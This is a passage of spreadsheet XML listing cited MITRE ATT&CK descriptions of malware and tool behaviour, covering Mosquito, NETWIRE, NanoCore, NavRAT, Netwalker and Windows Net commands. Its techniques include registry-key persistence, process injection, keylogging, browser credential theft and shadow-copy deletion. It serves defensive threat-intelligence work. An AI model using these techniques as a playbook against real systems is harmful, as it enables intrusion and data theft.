    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s installer searches the Registry and system to see if specific antivirus tools are installed on the system.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses the &lt;code&gt;ipconfig&lt;/code&gt; command.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) runs &lt;code&gt;whoami&lt;/code&gt; on the victim’s machine.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s installer uses WMI to search for antivirus display names.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can be used to scan IP networks.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can dump and print whole packet content.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can list NetBIOS computer names.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can be used to collect MAC addresses.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can list active users on the system.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) can obtain a list of all files and directories as well as logical drives.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) can download and execute a file from given URL.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) uses AES to encrypt certain information sent over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) obtains the victim computer name and encrypts the information to send over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) obtains the victim username and encrypts the information to send over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>Adversaries can also use [NETEAGLE](https://attack.mitre.org/software/S0034) to establish an RDP connection with a controller over TCP/7519.</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) is capable of reading files over the C2 channel.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) will attempt to detect if the infected host is configured to a proxy. If so, [NETEAGLE](https://attack.mitre.org/software/S0034) will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>If [NETEAGLE](https://attack.mitre.org/software/S0034) does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, [NETEAGLE](https://attack.mitre.org/software/S0034) will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) can send process listings over the C2 channel.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>The "SCOUT" variant of [NETEAGLE](https://attack.mitre.org/software/S0034) achieves persistence by adding itself to the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) will decrypt resources it downloads with HTTP requests by using RC4 with the key "ScoutEagle."(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) will attempt to detect if the infected host is configured to a proxy. If so, [NETEAGLE](https://attack.mitre.org/software/S0034) will send beacons via an HTTP POST request. [NETEAGLE](https://attack.mitre.org/software/S0034) will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) allows adversaries to execute shell commands on the infected host.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover and close windows on controlled systems.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to compress archived screenshots.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used a custom encryption algorithm to encrypt collected data.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can automatically archive collected data.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can retrieve passwords from messaging and mail client applications.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome.(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use crontabs to establish persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can encrypt C2 communications.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to search for files on the compromised host.(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can copy itself to and launch itself from hidden folders.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can downloaded payloads from C2 to the compromised host.(Citation: FireEye NETWIRE March 2019)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) client has been signed by fake and invalid digital certificates.(Citation: McAfee Netwire Mar 2015)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can perform keylogging.(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use launch agents for persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to write collected data to a file created in the &lt;code&gt;./LOGS&lt;/code&gt; directory.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through luring victims into opening malicious documents.(Citation: FireEye NETWIRE March 2019)(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through convincing victims into clicking malicious links.(Citation: FireEye NETWIRE March 2019)(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has masqueraded as legitimate software including TeamViewer and macOS Finder.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) stores its configuration file within the Registry.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use Native API including &lt;code&gt;CreateProcess&lt;/code&gt; &lt;code&gt;GetProcessById&lt;/code&gt;, and &lt;code&gt;WriteProcessMemory&lt;/code&gt;.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use TCP in C2 communications.(Citation: Red Canary NETWIRE January 2020)(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used a custom obfuscation algorithm to hide strings including Registry keys, APIs, and DLL names.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can persist via startup options for Login items.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) binary has been executed via PowerShell script.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover processes on compromised hosts.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) payload has been injected into benign Microsoft executables via process hollowing.(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can implement use of proxies to pivot traffic.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) creates a Registry start-up entry to establish persistence.(Citation: McAfee Netwire Mar 2015)(Citation: Red Canary NETWIRE January 2020)(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can create a scheduled task to establish persistence.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can capture the victim's screen.(Citation: McAfee Netwire Mar 2015)(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used .NET packer tools to evade detection.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been spread via e-mail campaigns utilizing malicious attachments.(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been spread via e-mail campaigns utilizing malicious links.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use AES encryption for C2 data transferred.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover and collect victim system information.(Citation: McAfee Netwire Mar 2015)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can collect the IP address of a compromised host.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can capture session logon details from a compromised host.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to use &lt;code&gt;/bin/bash&lt;/code&gt; and &lt;code&gt;/bin/sh&lt;/code&gt; to execute commands.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through use of VBScripts.(Citation: FireEye NETWIRE March 2019)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to communicate over HTTP.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used web services including Paste.ee to host payloads.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can issue commands using cmd.exe.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use XDG Autostart Entries to establish persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses a unique, custom de-obfuscation technique.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can delete files to cover tracks.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used FTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has downloaded a remote module for execution.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect data from the victim and stage it in &lt;code&gt;LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp&lt;/code&gt;.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) is written to %LOCALAPPDATA%\MicroSoft Updatea\svServiceUpdate.exe prior being executed in a new process in an apparent attempt to masquerade as a legitimate folder and file.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses Base64 encoding for strings.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has established persistence by writing the payload to the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used rundll32 for execution.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can gather information on drives and the operating system on the victim’s machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can gather information on the victim IP address.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect the username from the victim’s machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect the current timestamp of the victim's machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used HTTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) collects a unique identifier (UID) from a compromised host.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) collects the domain name from a compromised host.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) creates a new service to establish.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) uses DNS for the C2 communications.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can change Internet Explorer settings to reduce warnings about malware activity.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) launches a script to delete their original decoy file to cover tracks.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can download additional files from URLs.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) executes additional Jscript code on the victim's machine.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) uses mshta.exe to load its program and files.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) encodes files in Base64.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) modifies the %regrun% Registry to point itself to an autostart mechanism.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can gather the victim computer name and serial number.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can gather information about the victim proxy server.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) collects the username from the victim.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) executes additional VBScript code on the victim's machine.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can capture audio feeds from the system.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can modify the victim's firewall.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can modify the victim's anti-virus.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) has the capability to download and activate additional modules for execution.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can perform keylogging on the victim’s machine.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) has the capability to edit the Registry.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336)’s plugins were obfuscated with Eazfuscater.NET 3.3.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) creates a RunOnce key in the Registry to execute its VBS scripts each time the user logs on to the machine.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) uses DES to encrypt the C2 traffic.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) gathers the IP address from the victim’s machine.(Citation: DigiTrust NanoCore Jan 2017)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can access the victim's webcam and capture data.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) uses VBS files.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can open a remote command-line interface and execute commands.(Citation: PaloAlto NanoCore Feb 2016) [NanoCore](https://attack.mitre.org/software/S0336) uses JavaScript files.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) can download files remotely.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) logs the keystrokes on the targeted system.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) writes multiple outputs to a TMP file using the &gt;&gt; method.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses the email platform, Naver, for C2 communications, leveraging SMTP.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses &lt;code&gt;tasklist /v&lt;/code&gt; to check running processes.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) copies itself into a running Internet Explorer process to evade detection.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) uses &lt;code&gt;systeminfo&lt;/code&gt; on a victim’s machine.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) leverages cmd.exe to perform discovery techniques.(Citation: Talos NavRAT May 2018) [NavRAT](https://attack.mitre.org/software/S0247) loads malicious shellcode and executes it in memory.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) drops a signed Microsoft DLL to disk.(Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) creates a backdoor through which remote attackers can download files onto a compromised host.(Citation: Symantec Ristol May 2012)</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) creates a Registry subkey that registers a new service.(Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net user username \password \domain&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to create a domain account.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>[Net](https://attack.mitre.org/software/S0039) commands used with the &lt;code&gt;/domain&lt;/code&gt; flag can be used to gather information about and manipulate user accounts on the current domain.(Citation: Microsoft Net)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net group /domain&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate groups.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands under &lt;code&gt;net user&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate user accounts.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net user username \password&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to create a local account.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net group&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate groups.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to remove an established connection to a network share.(Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net view \\remotesystem&lt;/code&gt; and &lt;code&gt;net share&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to find shared drives and directories on remote and local systems respectively.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net accounts&lt;/code&gt; and &lt;code&gt;net accounts /domain&lt;/code&gt; commands with [Net](https://attack.mitre.org/software/S0039) can be used to obtain password policy information.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net view&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about available remote systems.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Lateral movement can be done with [Net](https://attack.mitre.org/software/S0039) through &lt;code&gt;net use&lt;/code&gt; commands to connect to the on remote systems.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;net stop&lt;/code&gt; commands can be used in [Net](https://attack.mitre.org/software/S0039) to execute or stop Windows services.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net use&lt;/code&gt; and &lt;code&gt;net session&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about network connections from a particular host.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net start&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to find information about Windows services.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>The &lt;code&gt;net time&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to determine the local or remote system time.(Citation: TechNet Net Time)</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) and [Windows Credential Editor](https://attack.mitre.org/software/S0005) to extract cached credentials from Windows systems.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses [PsExec](https://attack.mitre.org/software/S0029) to perform remote service manipulation to execute a copy of itself as part of lateral movement.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) reports window names along with keylogger information to provide application context.(Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) contains a keylogger.(Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can encrypt files on infected machines to extort victims.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the [Netwalker](https://attack.mitre.org/software/S0457) DLL being loaded into memory.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>The [Netwalker](https://attack.mitre.org/software/S0457) DLL has been injected reflectively into the memory of a legitimate running process.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec and certutil to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can delete the infected system's Shadow Volumes to prevent recovery.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec to copy the [Netwalker](https://attack.mitre.org/software/S0457) payload across accessible systems.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can add the following registry entry: &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\{8 random characters}&lt;/code&gt;.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
